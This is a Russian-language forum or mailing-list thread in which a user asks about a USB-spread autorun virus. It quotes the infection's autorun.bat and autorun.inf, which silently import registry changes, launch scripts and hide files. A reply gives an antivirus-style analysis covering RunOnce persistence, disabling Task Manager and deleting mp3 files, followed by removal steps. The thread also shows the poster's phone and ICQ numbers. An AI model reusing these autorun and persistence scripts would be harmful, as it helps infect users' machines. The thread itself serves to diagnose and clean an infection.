[TC] Открытие локальных дисков

Здравствуйте, Denis.

такое чудо повергло не только знакомого рафиса, но и мои компьютеры на
работе. специально принес для исследования на флешке следующие файлы,
которые кстати я намеренно не копировал:
1. папка recycler содержит файл autorun.exe
2. autorun.bat, текст:
echo off
rem autorunIз
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end

3. autorun.bin
4. autorun.exe
5. autorun.exe.exe
6. autorun.fcb
7. autorun.ico
8. autorun.inf, текст:
[autorun]
open=
shell\open=Eт(&O)
shell\open\Command=RECYCLER\autorun.exe -OpenCurDir
shell\open\Default=1
shell\explore=ЧКФEЬАнЖч(&X)
shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir

9. autorun.ini
10. autorun.srm
11. autorun.reg
12. autorun.txt
13. autorun.vbs
14. autorun.wsh

так вот наконец имею и я вопрос:
сколь опасен подобный вирус?
кто с ним сталкивался и что он делает?
das_in***@m*****.ru
das_in***@m*****.kg
Icq 331894252
моб. тел: +996 555 448111

Здравствуйте, das.

сколь опасен подобный вирус?
кто с ним сталкивался и что он делает?
Попробую ответить.

Файловый вирус. Является приложением Windows (PE EXE- файл). Имеет
размер 380416 байт. Написан на Delphi. При запуске вирус копирует свой
исполняемый файл в каталоги Windows: %System%\config\csrss.exe
%WinDir%\media\arona.exe Также программа создает следующий файл:
%System%\logon.bat Данный файл при запуске на исполнение запускает
копию вируса: %System%\config\csrss.exe С целью автоматического
запуска при каждом последующем старте операционной системы вирус
добавляет ссылку на данный файл в ключ автозапуска системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "Worms" =
"%System%\logon.bat" Вредоносная программа генерирует файлы:
%System%\config\autorun.inf h:\autorun.inf f:\autorun.inf
i:\autorun.inf g:\autorun.inf k:\autorun.inf l:\autorun.inf
o:\autorun.inf j:\autorun.inf Указанные файлы запускаются каждый раз,
когда пользователь открывает соответствующие разделы жесткого диска в
Проводнике. Аналогично %System%\logon.bat при исполнении файлы
запускают копию вируса %System%\config\csrss.exe. Деструктивная
активность Программа изменяет значения следующих ключей реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1 Также вирус производит поиск файлов с расширением
.mp3 в разделах жесткого диска: d:\ c:\ e:\ f:\ g:\ h:\ Найденные
файлы удаляются. Рекомендации по удалению Если ваш компьютер не был
защищен антивирусом и оказался заражен данной вредоносной программой,
то для ее удаления необходимо выполнить следующие действия: список из
5 элементов 1. При помощи Диспетчера задач завершить процесс вируса.
2. Удалить оригинальный файл вируса (его расположение на зараженном
компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить параметры из ключей системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "Worms" =
"%System%\logon.bat" 4. Удалить следующие файлы:
%System%\config\csrss.exe %WinDir%\media\arona.exe %System%\logon.bat
%System%\config\autorun.inf h:\autorun.inf f:\autorun.inf
i:\autorun.inf g:\autorun.inf k:\autorun.inf l:\autorun.inf
o:\autorun.inf j:\autorun.inf 5. Произвести полную проверку компьютера
Антивирусом